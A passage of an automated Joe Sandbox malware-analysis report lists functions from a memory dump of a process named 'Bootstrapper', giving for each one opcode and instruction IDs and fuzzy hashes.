                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e861c7f5ae90db1157af95261c32494f5e32f883df1ca82b4a9c2d13b186cb47
                                                                                          • Instruction ID: 575c74b1c09b881c339193b7c30ca1be3c963275d3f18d796d6a0b9bfd68bbfe
                                                                                          • Opcode Fuzzy Hash: e861c7f5ae90db1157af95261c32494f5e32f883df1ca82b4a9c2d13b186cb47
                                                                                          • Instruction Fuzzy Hash: 1B01A44591EAC61ED393B3BC28241A12FE49E53175B0C01F7D4C8CB087DA0C5857D39A
                                                                                          Function 00007FF848C373A0 Relevance: .0, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bf10fc62e152c1f85123b36e0b3c954b0380be2d3068e44c132539f7428e52d4
                                                                                          • Instruction ID: afd28d328dd919ca8b53a2c0725635ad05646b16fe96bc6e719e3c61136b03e9
                                                                                          • Opcode Fuzzy Hash: bf10fc62e152c1f85123b36e0b3c954b0380be2d3068e44c132539f7428e52d4
                                                                                          • Instruction Fuzzy Hash: 3DF08231A1C92A0EEBF8E25D944977267D4EF9A7F1F250177E48FC2192DA496C828248
                                                                                          Function 00007FF848C351A9 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4830f0171c99e5afd946485cca29a0a849a7b0742975db92555c3a7d3b880cad
                                                                                          • Instruction ID: 38d00775d6b21d86dd290feb4be81985433ad3c9d9f32c8eb3423e316d89a9ab
                                                                                          • Opcode Fuzzy Hash: 4830f0171c99e5afd946485cca29a0a849a7b0742975db92555c3a7d3b880cad
                                                                                          • Instruction Fuzzy Hash: 9801863081DACE4FDB86EF3888181A97FB0FF2A200F4404ABE858C72A2DA794914C341
                                                                                          Function 00007FF848C38975 Relevance: .0, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 008293b48342579aa0f515c5f7a1433acf33feb6a20aa57fe8a547a8b9e8c9b2
                                                                                          • Instruction ID: ed04c1c3fccf6e6da0f583ad2dc1f3382919ff83d2c5180bf860f849fb4a70b7
                                                                                          • Opcode Fuzzy Hash: 008293b48342579aa0f515c5f7a1433acf33feb6a20aa57fe8a547a8b9e8c9b2
                                                                                          • Instruction Fuzzy Hash: 8CF0B47180C7864FE7A1E72984856A43BD0FF59350F4805FBD08CCB1A2D76C99859356
                                                                                          Function 00007FF848C45B23 Relevance: .0, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 38cfe8254e5d725b3b6d3560a12527271af5524293cb396b5749423b691d8c7a
                                                                                          • Instruction ID: cbedd51987d6f4b71a4a629f5d5a865bc5235a397aac6b466d9dca79c0baa1ee
                                                                                          • Opcode Fuzzy Hash: 38cfe8254e5d725b3b6d3560a12527271af5524293cb396b5749423b691d8c7a
                                                                                          • Instruction Fuzzy Hash: A4F0FE71A2CB089F9F54AE0CBC434AD77D0FB88B60F10116FF95A43241D721B8928AC7
                                                                                          Function 00007FF848C3ABA2 Relevance: .0, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4b4e0bdf36ff870d3f6908c4395ff5410e7669e7f3335fb9606b60bb81a1fd65
                                                                                          • Instruction ID: 64e9fe6d5193dbf4bb74c6cc813ba85914cc33bc90a0e404974d970378dc6513
                                                                                          • Opcode Fuzzy Hash: 4b4e0bdf36ff870d3f6908c4395ff5410e7669e7f3335fb9606b60bb81a1fd65
                                                                                          • Instruction Fuzzy Hash: CCF0A42040DAC61FD356A73894546A17BE0EF46350F4A01E7D448CB197DA189895D355
                                                                                          Function 00007FF848C4B59B Relevance: .0, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 780d7c1238f05a909d7bfc0cd00ac80c5f1c47b1dc52257fd5247c8e861373b0
                                                                                          • Instruction ID: c0687035cb2e751503b0e0b941d7ad2657962f3b2d790d390fa27b0799db600b
                                                                                          • Opcode Fuzzy Hash: 780d7c1238f05a909d7bfc0cd00ac80c5f1c47b1dc52257fd5247c8e861373b0
                                                                                          • Instruction Fuzzy Hash: 28F03772B1CA1D4FE789FA1C78021F9B7D2EB89960B10416FD48EC7186DE1568075785
                                                                                          Function 00007FF848C389C5 Relevance: .0, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 443f21248c50d07616bbe73a31eb95dd8ce31b8cb732c62bb68b894f69b75bb5
                                                                                          • Instruction ID: 22baf31d5735b9bd586e362b8609da578788775596d8d11c18fdcc68e3019efa
                                                                                          • Opcode Fuzzy Hash: 443f21248c50d07616bbe73a31eb95dd8ce31b8cb732c62bb68b894f69b75bb5
                                                                                          • Instruction Fuzzy Hash: 9CF0906550E3D10FD357A72948610957F70EF92151F8E02FBC1C4CA0E3EA5C458A9366
                                                                                          Function 00007FF848C35AD8 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9fd3513acbb94f14bb395ae456e300db7c38f81f5a8ebc6029c21a9497038c47
                                                                                          • Instruction ID: 81f0e239b4b77eb90ce9e31e93b722e5581d154f86f873e53abbebc4ead099b2
                                                                                          • Opcode Fuzzy Hash: 9fd3513acbb94f14bb395ae456e300db7c38f81f5a8ebc6029c21a9497038c47
                                                                                          • Instruction Fuzzy Hash: F5E0122191CB464BE784FA364C4507A71D1FB88295F844A7BD88CC1150EB7CD7D5B646
                                                                                          Function 00007FF848C3E4D0 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 79927747b7e6e20d311eeeb51085bfce991a940cffbb8a6f91f1c712e41dbcca
                                                                                          • Instruction ID: 9f99eb2a1d0ada6b31c585b83db70c8be6812f2f0d1d82549d18bf97bd5cdae9
                                                                                          • Opcode Fuzzy Hash: 79927747b7e6e20d311eeeb51085bfce991a940cffbb8a6f91f1c712e41dbcca
                                                                                          • Instruction Fuzzy Hash: A6E0E65550F6C92FCE82F77C45761997F509E4F284B1984E9D4C95F5A3D108145F9301
                                                                                          Function 00007FF848C30B01 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e9dc1e5ec933d7b661a7ab116d4b890f229245d585bd27aff4b444f8a6830ee
                                                                                          • Instruction ID: a908c681903989bfa172e65076f90b2a3e7f989fec6e1b7c8971e4010c83790f
                                                                                          • Opcode Fuzzy Hash: 4e9dc1e5ec933d7b661a7ab116d4b890f229245d585bd27aff4b444f8a6830ee
                                                                                          • Instruction Fuzzy Hash: 3EE04F3150D4495FDF05FB64C8A2AEDBBA1FF59300F000479D44A9B1D6DE2466458781
                                                                                          Function 00007FF848C36437 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a01ee887dcca1abe846bac501f9623f9ac69e08e46d689c6bc11b29f7bedbc14
                                                                                          • Instruction ID: c510fe2b9b6c74a970f210659845bd63bfd600f8f4519b126d5fcccd0f95f481
                                                                                          • Opcode Fuzzy Hash: a01ee887dcca1abe846bac501f9623f9ac69e08e46d689c6bc11b29f7bedbc14
                                                                                          • Instruction Fuzzy Hash: 14D0A71171DA490BE7C1B5A860C51FD6281DB95211F80453FD40AC218BCE5D988AC305
                                                                                          Function 00007FF848C4A2F2 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e5b190fc1a39a6a2325b5f9b0f5c77da935dbd74fd60a94bf23d82ba816dcff1
                                                                                          • Instruction ID: 7b61066ee93f95289415a7fe9c392f149ab80e57b3be6ecac1e8f2ee8d648925
                                                                                          • Opcode Fuzzy Hash: e5b190fc1a39a6a2325b5f9b0f5c77da935dbd74fd60a94bf23d82ba816dcff1
                                                                                          • Instruction Fuzzy Hash: 64C04C01B5D81A1FE6D4F69D38812F941C2EBC81A1B545577E10DC228ACE2D9C972385
                                                                                          Function 00007FF848C3340B Relevance: .0, Instructions: 14COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7995ecb2f4e2c424b32187d2917111959a1dc51469fc97d7dab668bb380f5f7b
                                                                                          • Instruction ID: 3b00a28d855776103e956cd111950731d557f713905091eb7dffac0512e3cdc0
                                                                                          • Opcode Fuzzy Hash: 7995ecb2f4e2c424b32187d2917111959a1dc51469fc97d7dab668bb380f5f7b
                                                                                          • Instruction Fuzzy Hash: 6EC08032A5441C4EDB40F69CF8014ECB3A4FF84231F000133D42DD1191DB5515514744
                                                                                          Function 00007FF848C3326E Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 37fe1b9a4d62541910266dc0e7a82a32a9445d013c4b33dd64889ac63bc8cd02
                                                                                          • Instruction ID: 090efbbe4786dd642b0fe17a6cb2fd944e08140429d60d954310eef5eeb422a6
                                                                                          • Opcode Fuzzy Hash: 37fe1b9a4d62541910266dc0e7a82a32a9445d013c4b33dd64889ac63bc8cd02
                                                                                          • Instruction Fuzzy Hash: CBD01221E0C84E9FE7C5FA2CD4596F96792EF95740F44006AD40DC31C7CE189C879345